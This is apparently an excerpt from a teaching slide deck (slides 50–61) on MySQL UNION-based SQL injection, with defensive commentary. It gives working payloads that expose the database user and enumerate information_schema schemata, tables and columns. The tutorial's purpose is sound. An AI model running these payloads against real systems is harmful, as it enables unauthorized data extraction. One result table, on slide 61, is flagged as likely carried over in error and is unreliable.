SQL
-- Baseline query for the rest of this section. The literal after "id=" is the
-- position where the following slides splice in untrusted input; binding that
-- value as a parameter (WHERE id = ?) instead of concatenating it is the fix
-- that every later slide motivates.
SELECT * FROM users WHERE id=1;
id username password
1 test test
2 admin 1234
3 yzu yz1234
4 itac itac
Slide 50
Slide 50 text
SQL
-- A UNION appended to the baseline query. The three literals line up with the
-- three result columns (id, username, password) shown in the table below, so
-- the server accepts the extra SELECT; the result lists the real rows plus the
-- constant "1 2 3" row. A row of constants showing up in application output is
-- the observable symptom this section builds on.
SELECT * FROM users WHERE id=1 UNION
SELECT 1,2,3;
id username password
1 test test
2 admin 1234
3 yzu yz1234
4 itac itac
1 2 3
Slide 51
Slide 51 text
SQL
-- id=-1 matches no real row, so only the UNION row comes back (see the result
-- below). For a defender this is the tell-tale shape of a probe: a predicate
-- that can never be true, followed by a UNION whose output replaces the page
-- data. Parameterizing the id value removes the problem entirely.
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,2,3;
id username password
1 2 3
Slide 52
Slide 52 text
SQL
-- Same UNION, with the second constant replaced by MySQL's user(). The result
-- shows the application connects as root@localhost, i.e. a fully privileged
-- account. Running the application under a least-privilege database account
-- limited to the tables it actually needs is what bounds the damage once a
-- statement turns out to be injectable.
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,user(),3;
id username password
1 root@localhost 3
Slide 53
Slide 53 text
• information_schema
MySQL
Slide 54
Slide 54 text
• information_schema
• 存有資料庫的中繼資料
MySQL
Slide 55
Slide 55 text
• information_schema
• 存有資料庫的中繼資料
• Database Name
• Table Name
• Column Name
MySQL
Slide 56
Slide 56 text
• Database Name
• information_schema.schemata
• Table Name
• information_schema.tables
• Column Name
• information_schema.columns
MySQL
Slide 57
Slide 57 text
SQL
-- The UNION now reads information_schema.schemata; the result shows the schema
-- "login". The metadata views are readable here because of the privileged
-- connection shown on the previous slide. Ordinary application queries never
-- touch information_schema, so such statements in the query log are a
-- high-signal detection.
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,schema_name,3 FROM
information_schema.schemata;
id username password
1 login 3
Slide 58
Slide 58 text
SQL
-- Next metadata step: table names of the schema found on the previous slide.
-- The result shows the single table "users". As with the schemata read, this
-- only works because the application's database account may read
-- information_schema for other schemas; a scoped account would not return it.
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,table_name,3 FROM
information_schema.tables WHERE
table_schema='login';
id username password
1 users 3
Slide 59
Slide 59 text
SQL
-- Column names of the users table. The result shows only "id", presumably
-- because the application renders a single row; there is no ORDER BY, so which
-- column name appears first is up to the server. The following slide pages
-- through the remaining names one at a time.
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,column_name,3 FROM
information_schema.columns WHERE
table_name='users';
id username password
1 id 3
Slide 60
Slide 60 text
SQL
-- Same query as the previous slide with MySQL's "LIMIT offset, count" form
-- (limit 1,1 = skip one row, return one), so the second column name,
-- "username", is shown. The keyword is lowercase here while the rest of the
-- deck uppercases keywords; it is a style inconsistency only.
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,column_name,3 FROM
information_schema.columns WHERE
table_name='users' limit 1,1;
id username password
1 username 3
Slide 61
Slide 61 text
SQL
-- group_concat collapses every column name into one comma-separated value, so a
-- single displayed row is enough to show them all. NOTE(review): the result
-- table below shows "id" alone, which looks carried over from slide 59;
-- GROUP_CONCAT would return the names joined by commas — confirm against the
-- original deck.
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,group_concat(column_name),3 FROM
information_schema.columns WHERE
table_name='users';
id username password
1 id 3